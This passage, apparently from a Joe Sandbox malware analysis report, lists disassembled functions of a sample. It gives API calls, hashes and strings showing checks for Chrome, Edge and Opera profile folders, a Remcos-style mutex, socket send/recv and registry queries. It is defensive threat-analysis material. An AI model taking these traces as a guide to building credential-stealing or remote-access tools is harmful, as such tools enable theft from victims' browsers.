                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1454876536-0
                                                                                                                                                                • Opcode ID: 6b566032c38565a3c721986e2c770af40c2a847eae61f65785c1f7b99ffe2bcf
                                                                                                                                                                • Instruction ID: fe095d128cfe649b1921c3c00b9e3c26162b6800e84961292202b07e044b4dc0
                                                                                                                                                                • Opcode Fuzzy Hash: 6b566032c38565a3c721986e2c770af40c2a847eae61f65785c1f7b99ffe2bcf
                                                                                                                                                                • Instruction Fuzzy Hash: E3213EB5C0060D9FCB10DF94D9457DEBFB9FB06324F200229E919A6280E7356659CFA1
                                                                                                                                                                Function 0007A6EF Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,0006A3E4), ref: 0007A70C
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,0006A3E4), ref: 0007A720
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,0006A3E4), ref: 0007A745
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,0006A3E4), ref: 0007A753
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                                • Opcode ID: bc4c2b6082aeb51ab09dfbf630a0762d7a62b9708cdb9ff16fe85c0683cca7d0
                                                                                                                                                                • Instruction ID: bf81eb456c749ede5f7bd36686b2e670673b89f1611c047e5de1a0550e35feb1
                                                                                                                                                                • Opcode Fuzzy Hash: bc4c2b6082aeb51ab09dfbf630a0762d7a62b9708cdb9ff16fe85c0683cca7d0
                                                                                                                                                                • Instruction Fuzzy Hash: 5701D170A01208BFFB145B60DCC5EFF7BBCEB86264F104269F905A3281DA390E019670
                                                                                                                                                                Function 6FE4A0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc
                                                                                                                                                                • String ID: jo$jo
                                                                                                                                                                • API String ID: 190572456-349280244
                                                                                                                                                                • Opcode ID: 42c1c0d525b2c7d0e05c4345083dba3cd344f3b47a0b4fdd037a990c478755ad
                                                                                                                                                                • Instruction ID: 4bf03a48eff489d2fafac0b47030a16b6a664432521ead36471baaa66d91347c
                                                                                                                                                                • Opcode Fuzzy Hash: 42c1c0d525b2c7d0e05c4345083dba3cd344f3b47a0b4fdd037a990c478755ad
                                                                                                                                                                • Instruction Fuzzy Hash: 7451F0B0904218CFDB18DFA8E94679DBFB1BB8A710F20826EE419AB390D7319905CF55
                                                                                                                                                                Function 0006C105 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,0006C245), ref: 0006C138
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                                                                                • API String ID: 1174141254-4188645398
                                                                                                                                                                • Opcode ID: ba54e602275a0d710d1a1c3481f4a5ad6296292cbcedcbe67a8d143ffa094e41
                                                                                                                                                                • Instruction ID: 66e7c88035013aad7b55660c255d665c6dc352c825b3b432de79de5691f7e896
                                                                                                                                                                • Opcode Fuzzy Hash: ba54e602275a0d710d1a1c3481f4a5ad6296292cbcedcbe67a8d143ffa094e41
                                                                                                                                                                • Instruction Fuzzy Hash: 72F08231600215968A04F7E4DC17CFE7B699B05B10B904129BA01A6183EE649A4582D1
                                                                                                                                                                Function 0006C168 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,0006C314), ref: 0006C19B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                                                                                • API String ID: 1174141254-2800177040
                                                                                                                                                                • Opcode ID: 897b1d73a7228d5236d190b49368bc2e0a44d7e0cd477233b83d27384f555314
                                                                                                                                                                • Instruction ID: 4f8d3c6c491db271908cb02fe1c8ff215979cccd5d1d63a8d6728a44d05b7b6e
                                                                                                                                                                • Opcode Fuzzy Hash: 897b1d73a7228d5236d190b49368bc2e0a44d7e0cd477233b83d27384f555314
                                                                                                                                                                • Instruction Fuzzy Hash: 64F08231600215968A04F7E4DC17CFF7B6E9F01710B50012ABA01A61C3EE609E4586E1
                                                                                                                                                                Function 0006C1CB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0006C3DD), ref: 0006C1FE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                                                                                • API String ID: 1174141254-1629609700
                                                                                                                                                                • Opcode ID: 3b8c13f1f7775af36577dfdb6e777c52749688534e58a0ab144fbf647fff7639
                                                                                                                                                                • Instruction ID: 4d389fe61856668dafa55c48480516271ce3c3a2c128cae2fe5f80e9f01cbbb5
                                                                                                                                                                • Opcode Fuzzy Hash: 3b8c13f1f7775af36577dfdb6e777c52749688534e58a0ab144fbf647fff7639
                                                                                                                                                                • Instruction Fuzzy Hash: FFF0A73164021A568A14F7E4DC17DFF7B6DDF00B50B440129BE41635C7DE60DA45C2E1
                                                                                                                                                                Function 0006CA50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0006DCE3,00000006,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0006CA5F
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0006CA65
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                • String ID: Rmc-RNN6CM
                                                                                                                                                                • API String ID: 1925916568-769163239
                                                                                                                                                                • Opcode ID: 6eb2ae896c32eb6a0578d84d52c1a0773fb5f50113e9d1124157d35c9959520f
                                                                                                                                                                • Instruction ID: e2cb3ba2077760c54f250c20a31744ee16f48c522f5f06b24c8d95b8e65cd5b9
                                                                                                                                                                • Opcode Fuzzy Hash: 6eb2ae896c32eb6a0578d84d52c1a0773fb5f50113e9d1124157d35c9959520f
                                                                                                                                                                • Instruction Fuzzy Hash: 97C04CB13542046BFB0827759C5ABFD2956AB94702F150539B107D55E2CA5D4C50A522
                                                                                                                                                                Function 6FEA1054 Relevance: 4.7, APIs: 3, Instructions: 197COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA1209
                                                                                                                                                                  • Part of subcall function 6FE993EF: HeapAlloc.KERNEL32(00000000,?,?,?,00000003,6FE9681B,?,?,?,?,00000000,?,00000000,?,?,6FE98FBF), ref: 6FE99421
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA121C
                                                                                                                                                                • __freea.LIBCMT ref: 6FEA1229
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __freea$AllocHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 85559729-0
                                                                                                                                                                • Opcode ID: 26d0aca34f6779576cab190261e6a3068a74fe973838616bbcc69285b8fe7e2c
                                                                                                                                                                • Instruction ID: fd9e19b02fa7380cfcd3f9e72a6fcf606bca34405fd05960caa98356c489c3b6
                                                                                                                                                                • Opcode Fuzzy Hash: 26d0aca34f6779576cab190261e6a3068a74fe973838616bbcc69285b8fe7e2c
                                                                                                                                                                • Instruction Fuzzy Hash: C151A6725002066BEB118FE5EC80DAF3EA9DF95258B21012EFD14DA254E776D8509A71
                                                                                                                                                                Function 00064BE3 Relevance: 4.6, APIs: 3, Instructions: 77synchronizationnetworkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000000,000655B4,00000008,00000004,00000000,0000000C,00000000,?,000D1ED8,?), ref: 00064C67
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,000655B4,00000073,?,?,000C2790,?,?,?,?), ref: 00064C95
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3963590051-0
                                                                                                                                                                • Opcode ID: f590979b3a44e14d79fddda2d744927c7e68cb6ac7ca72fdb9d00e25b2354987
                                                                                                                                                                • Instruction ID: e9867657ffd0224a1cc42caf752897dd48c110b82dccfeca534016a54c0c17f1
                                                                                                                                                                • Opcode Fuzzy Hash: f590979b3a44e14d79fddda2d744927c7e68cb6ac7ca72fdb9d00e25b2354987
                                                                                                                                                                • Instruction Fuzzy Hash: 74216272A00609AFD705EFA4DC92DEEB76AFF10310B108229F516576E2DF756D05C790
                                                                                                                                                                Function 6FE7C3A0 Relevance: 4.6, APIs: 3, Instructions: 70COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 6FE7C3C7
                                                                                                                                                                • GetFileInformationByHandleEx.KERNEL32(?,00000009,00000000,00000008), ref: 6FE7C3F9
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7C46B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHandleInformation$ErrorLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3070998852-0
                                                                                                                                                                • Opcode ID: 0b28ee133366c9ec2718006fbf43d0fccc31c5147de14c674e997bca2e7e793e
                                                                                                                                                                • Instruction ID: 6105aa009e4247b3065e4f92cceaa15ed29b50f15ea019f8de46f2c259b8efb0
                                                                                                                                                                • Opcode Fuzzy Hash: 0b28ee133366c9ec2718006fbf43d0fccc31c5147de14c674e997bca2e7e793e
                                                                                                                                                                • Instruction Fuzzy Hash: 1D3148B0D00B098BDB20CF59C5447AAFBF4BF99304F10861ED89AA6651E774B585CB90
                                                                                                                                                                Function 00071ACE Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,000D22B8), ref: 00071AEA
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00071B03
                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 00071B0E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                • Opcode ID: 829b17ace465e5e9ac47e3bf35e1de4eaf6e922aa9310ae3ec604af5133ef245
                                                                                                                                                                • Instruction ID: 9d8e72a5b18b4ee47ba9911dd2d24af97fc0b7448c5851322f831939c8588dba
                                                                                                                                                                • Opcode Fuzzy Hash: 829b17ace465e5e9ac47e3bf35e1de4eaf6e922aa9310ae3ec604af5133ef245
                                                                                                                                                                • Instruction Fuzzy Hash: C4014B3190012DBBDF216F91DC45DEF7F79EF05350F008151BA1862061E73A8965DBA0
                                                                                                                                                                Function 00071919 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00071939
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,000D22B8), ref: 00071957
                                                                                                                                                                • RegCloseKey.KERNEL32(?), ref: 00071962
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                • Opcode ID: a13c022e461060ba8225620228d9b1f6a9811b5d0e2f1e4a2169e678d2423b9a
                                                                                                                                                                • Instruction ID: 8bf5f6e6bdaa3a82bbecbe0d8b03ddf7a801ecf6e1df1debe6098e42d7f592bb
                                                                                                                                                                • Opcode Fuzzy Hash: a13c022e461060ba8225620228d9b1f6a9811b5d0e2f1e4a2169e678d2423b9a
                                                                                                                                                                • Instruction Fuzzy Hash: E8F01D76D10208BFEF109FA59C45FEE7BBCEF04710F108195BA09E6190D6395A549B94
                                                                                                                                                                Function 00064CB6 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationnetworkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,000D1ED8,000D1ED8,?,00064D71,00000000,00000000,00000000,?,000D1ED8,?), ref: 00064CC9
                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,00064D71,00000000,00000000,00000000,?,000D1ED8,?), ref: 00064CE5
                                                                                                                                                                • recv.WS2_32(FFFFFFFF,000D1ED8,?,00000000), ref: 00064CFA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EventObjectSingleWaitrecv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 311754179-0
                                                                                                                                                                • Opcode ID: 65a87a157d95f05e87c1dabfb3064befc05a775625ef067e8d4dc92df623df3e
                                                                                                                                                                • Instruction ID: 54803c880c0fe67e137f7c5dfd18b37fe271c5db4a41e2f0023caa931e422ccd
                                                                                                                                                                • Opcode Fuzzy Hash: 65a87a157d95f05e87c1dabfb3064befc05a775625ef067e8d4dc92df623df3e
                                                                                                                                                                • Instruction Fuzzy Hash: 56F05E3A104615BFEB055F54EC09E99BB66FB45371F208226F914422B0DB77F860DBA4
                                                                                                                                                                Function 000718CF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,000D2318,?,?,0006E19C,del), ref: 000718E6
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,0006E19C,00000000,00000000,00000000,00000000,?,?,0006E19C,del), ref: 000718FA
                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?,0006E19C,del), ref: 00071905
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                • Opcode ID: 25eaadada504ca61e0f4ad5ed1d8e93f70e50957a4ffcb3c0107dad895648adb
                                                                                                                                                                • Instruction ID: 0cadd3fbe39f3843a903d78ed6dfefb3dd075d7595cb23664a2cc55fe27b69c3
                                                                                                                                                                • Opcode Fuzzy Hash: 25eaadada504ca61e0f4ad5ed1d8e93f70e50957a4ffcb3c0107dad895648adb
                                                                                                                                                                • Instruction Fuzzy Hash: 84E06532811138FB9B305BA29D0DDEB7F6CDF067A0B104144BD0D92111D62A4E50E6F0
                                                                                                                                                                Function 6FE693B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID: $
                                                                                                                                                                • API String ID: 31276548-3993045852
                                                                                                                                                                • Opcode ID: 5cb7550bc193abf6b9f0bcc505508db1402e94844483d9ba157797ff0f9537e1
